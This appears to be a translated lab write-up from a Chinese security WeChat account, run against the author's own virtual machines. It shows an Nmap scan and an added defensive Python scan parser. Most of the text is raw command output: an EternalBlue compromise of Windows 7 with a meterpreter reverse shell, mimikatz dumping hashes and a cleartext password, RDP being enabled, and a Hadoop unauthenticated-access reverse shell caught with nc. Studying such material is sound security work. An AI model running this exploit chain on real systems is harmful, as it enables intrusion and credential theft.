139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.91 seconds
(base) ➜ ~
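As an added example (not code from the original write-up), a small Python parser for Nmap's normal output in the format shown above: it collects each host's open ports and OS guess and returns the hosts that expose 445/tcp with a Windows fingerprint, which is the list a defender would hand to patch management to confirm MS17-010 status. The scan text inside the block is constructed to mirror the page's results, not a real capture.

```python
"""Parse Nmap normal output into per-host records and flag hosts that expose
SMB (445/tcp) and fingerprint as Windows, so their MS17-010 patch state can be
verified first.

Added example; not part of the original write-up. SAMPLE_SCAN is constructed
to mirror the page's results and is not a real capture.
"""
import re
from dataclasses import dataclass, field

# Constructed sample, shaped like the page's "nmap -sS" / "nmap -O" output.
SAMPLE_SCAN = """\
Nmap scan report for 10.211.55.2
Host is up (0.0013s latency).
All 1000 scanned ports on 10.211.55.2 are closed

Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00022s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:1C:42:F4:4F:FE (Parallels)
Running (JUST GUESSING): Microsoft Windows Longhorn|10|2008|7|Vista|8.1 (94%)

Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00019s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
No exact OS matches for host (test conditions non-ideal).

Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00017s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
Running: Microsoft Windows 7|2008|8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2
"""

# "Nmap scan report for name (ip)" or "Nmap scan report for ip"
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d+\.\d+\.\d+\.\d+)\)?$")
# "445/tcp open  microsoft-ds"
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<svc>\S+)")
# "Running: ...", "Running (JUST GUESSING): ..." or "OS details: ..."
OS_RE = re.compile(r"^(?:Running(?: \(JUST GUESSING\))?|OS details): (?P<os>.+)$")


@dataclass
class Host:
    ip: str
    hostname: str = ""
    open_ports: dict = field(default_factory=dict)   # port number -> service name
    os_guess: str = ""


def parse_nmap(text: str) -> list:
    """Return one Host per 'Nmap scan report' block, in scan order."""
    hosts, cur = [], None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            cur = Host(ip=m.group("ip"), hostname=m.group("name") or "")
            hosts.append(cur)
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m and m.group("state") == "open":
            cur.open_ports[int(m.group("port"))] = m.group("svc")
            continue
        m = OS_RE.match(line)
        # "OS details" (an exact-class match) overrides the broader "Running" line
        if m and (not cur.os_guess or line.startswith("OS details")):
            cur.os_guess = m.group("os")
    return hosts


def smb_exposed_windows(hosts: list) -> list:
    """IPs that expose 445/tcp and fingerprint as Windows: the set whose
    MS17-010 patch state needs to be checked first."""
    return [h.ip for h in hosts
            if 445 in h.open_ports and "windows" in h.os_guess.lower()]


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_SCAN)
    for h in parsed:
        print(h.ip, h.hostname or "-", sorted(h.open_ports), h.os_guess or "-")
    print("confirm MS17-010 patch state on:", smb_exposed_windows(parsed))
```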

Exploitation - Windows MS17-010

(base) ➜ ~ msfconsole

       =[ metasploit v5.0.102-dev-37e0c7d01701fe276ef76f9e30d807261866e9df]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
Metasploit tip: View missing module options with show missing
msf5 > search ms17-010
Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.211.55.5
rhosts => 10.211.55.5
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.211.55.5:445       - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.211.55.5:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.211.55.8
rhosts => 10.211.55.8
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.211.55.8:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.211.55.8:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > use ms17_010_eternalblue
Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

Interact with a module by name or index, for example use 1 or use exploit/windows/smb/ms17_010_eternalblue_win8
msf5 auxiliary(scanner/smb/smb_ms17_010) > use 1
[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue_win8
msf5 auxiliary(scanner/smb/smb_ms17_010) > use 0
[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue_win8
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.211.55.8
rhosts => 10.211.55.8
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rport 445
rport => 445
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 10.211.55.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.211.55.8:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.211.55.8:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.211.55.8:445 - Connecting to target for exploitation.
[+] 10.211.55.8:445 - Connection established for exploitation.
[+] 10.211.55.8:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.211.55.8:445 - CORE raw buffer dump (38 bytes)
[*] 10.211.55.8:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 10.211.55.8:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 10.211.55.8:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 10.211.55.8:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.211.55.8:445 - Trying exploit with 12 Groom Allocations.
[*] 10.211.55.8:445 - Sending all but last fragment of exploit packet
[*] 10.211.55.8:445 - Starting non-paged pool grooming
[+] 10.211.55.8:445 - Sending SMBv2 buffers
[+] 10.211.55.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.211.55.8:445 - Sending final SMBv2 buffers.
[*] 10.211.55.8:445 - Sending last fragment of exploit packet!
[*] 10.211.55.8:445 - Receiving response from exploit packet
[+] 10.211.55.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.211.55.8:445 - Sending egg to corrupted connection.
[*] 10.211.55.8:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:49249) at 2020-08-08 20:00:18 +0800
[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shell
Process 2792 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . : localdomain
   IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b
   Temporary IPv6 Address. . . . . . : fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037
   Link-local IPv6 Address . . . . . : fe80::7002:eaf9:c043:7b1b%14
   IPv4 Address. . . . . . . . . . . : 10.211.55.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::21c:42ff:fe00:18%14
                                       10.211.55.1

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain

C:\Windows\system32>exit
exit
meterpreter > shell
Process 2852 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>systeminfo
systeminfo

Host Name:                 RETURN0FA54
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          return0;
Registered Organization:
Product ID:                00426-384-1216344-06000
Original Install Date:     2020/7/13, 1:45:07
System Boot Time:          2020/8/8, 14:45:29
System Manufacturer:       Parallels Software International Inc.
System Model:              Parallels Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2400 Mhz
BIOS Version:              Parallels Software International Inc. 15.1.4 (47270), 2020/4/13
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             zh-cn;Chinese (China)
Input Locale:              en-us;English (United States)
Time Zone:                 N/A
Total Physical Memory:     4,096 MB
Available Physical Memory: 3,313 MB
Virtual Memory: Max Size:  8,189 MB
Virtual Memory: Available: 7,308 MB
Virtual Memory: In Use:    881 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Parallels Ethernet Adapter
                                 Connection Name: Local Area Connection 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.211.55.1
                                 IP address(es)
                                 [01]: 10.211.55.8
                                 [02]: fe80::7002:eaf9:c043:7b1b
                                 [03]: fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037
                                 [04]: fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b

C:\Windows\system32>exit
exit
meterpreter > upload /Users/return0/Desktop/tools/10内网渗透/mimikatz_trunk/x64/mimikatz.exe
[*] uploading  : /Users/return0/Desktop/tools/10内网渗透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe
[*] Uploaded 1.21 MiB of 1.21 MiB (100.0%): /Users/return0/Desktop/tools/10内网渗透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe
[*] uploaded   : /Users/return0/Desktop/tools/10内网渗透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe
meterpreter > shell
Process 1088 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001
C:\Windows\system32>mimikatz.exe
mimikatz.exe
  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # sekurlsa::logopasswords
ERROR mimikatz_doLocal ; "logopasswords" command of "sekurlsa" module not found !

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process context
        minidump  -  Switch (or reinit) to LSASS minidump context
         bootkey  -  Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
           trust  -  Antisocial
      backupkeys  -  Preferred Backup Master keys
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 73647 (00000000:00011faf)
Session           : Interactive from 1
User Name         : return0
Domain            : RETURN0FA54
Logon Server      : RETURN0FA54
Logon Time        : 2020/8/8 14:45:41
SID               : S-1-5-21-2676871807-2807053931-1165176819-1000
        msv :
         [00000003] Primary
         * Username   : return0
         * Domain     : RETURN0FA54
         * LM         : b47f9a39939fbe2e3cfeb463bfee415c
         * NTLM       : 52dec73c7fb089d8917fbdf7985b6036
         * SHA1       : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf
        tspkg :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        wdigest :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        kerberos :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        ssp :
        credman :

Authentication Id : 0 ; 73594 (00000000:00011f7a)
Session           : Interactive from 1
User Name         : return0
Domain            : RETURN0FA54
Logon Server      : RETURN0FA54
Logon Time        : 2020/8/8 14:45:41
SID               : S-1-5-21-2676871807-2807053931-1165176819-1000
        msv :
         [00000003] Primary
         * Username   : return0
         * Domain     : RETURN0FA54
         * LM         : b47f9a39939fbe2e3cfeb463bfee415c
         * NTLM       : 52dec73c7fb089d8917fbdf7985b6036
         * SHA1       : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf
        tspkg :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        wdigest :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        kerberos :
         * Username   : return0
         * Domain     : RETURN0FA54
         * Password   : woshidashabi!
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:40
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : RETURN0FA54$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:40
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username   : RETURN0FA54$
         * Domain     : WORKGROUP
         * Password   : (null)
        kerberos :
         * Username   : return0fa54$
         * Domain     : WORKGROUP
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 30280 (00000000:00007648)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:39
SID               :
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : RETURN0FA54$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2020/8/8 14:45:39
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username   : RETURN0FA54$
         * Domain     : WORKGROUP
         * Password   : (null)
        kerberos :
         * Username   : return0fa54$
         * Domain     : WORKGROUP
         * Password   : (null)
        ssp :
        credman :

mimikatz # exit
Bye!
C:\Windows\system32>wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
Executing (\\RETURN0FA54\ROOT\CIMV2\TerminalServices:Win32_TerminalServiceSetting.ServerName="RETURN0FA54")->SetAllowTSConnections()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
};
C:\Windows\system32>exit

Exploitation: Hadoop unauthenticated access to get a shell

Last login: Sat Aug  8 19:54:07 on ttys001
(base) ➜  ~ nc -l 8888
bash: cannot set terminal process group (211): Inappropriate ioctl for device
bash: no job control in this shell
<33412_0001/container_1596872533412_0001_01_000001# whoami
whoami
root
<33412_0001/container_1596872533412_0001_01_000001# ifconfig
ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:ac:1a:00:02
          inet addr:172.26.0.2  Bcast:172.26.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17365 errors:0 dropped:0 overruns:0 frame:0
          TX packets:34456 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1858357 (1.7 MiB)  TX bytes:5760591 (5.4 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:8 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:647 (647.0 B)  TX bytes:647 (647.0 B)

<33412_0001/container_1596872533412_0001_01_000001# id
id
uid=0(root) gid=0(root) groups=0(root)
<33412_0001/container_1596872533412_0001_01_000001# exit

A side note

[Images omitted: "what it was supposed to look like", "what it turned out like", "what it ended up as"]


Thank you for bearing with me this far. The full version is on Yuque; if you want to read it, you are welcome to join my Yuque team. I would like to put a team together, since working alone is very lonely, and I hope more people will come and refine and build up the Yuque library with me, recording what we learn, gain and realise. You can send me a private message through the WeChat official account and I will tell you how to join. (There is a bar to entry, but it is not high; the point is to see whether you are a good fit.)

This article is shared from the WeChat official account 攻防SRC (SNNUSRC).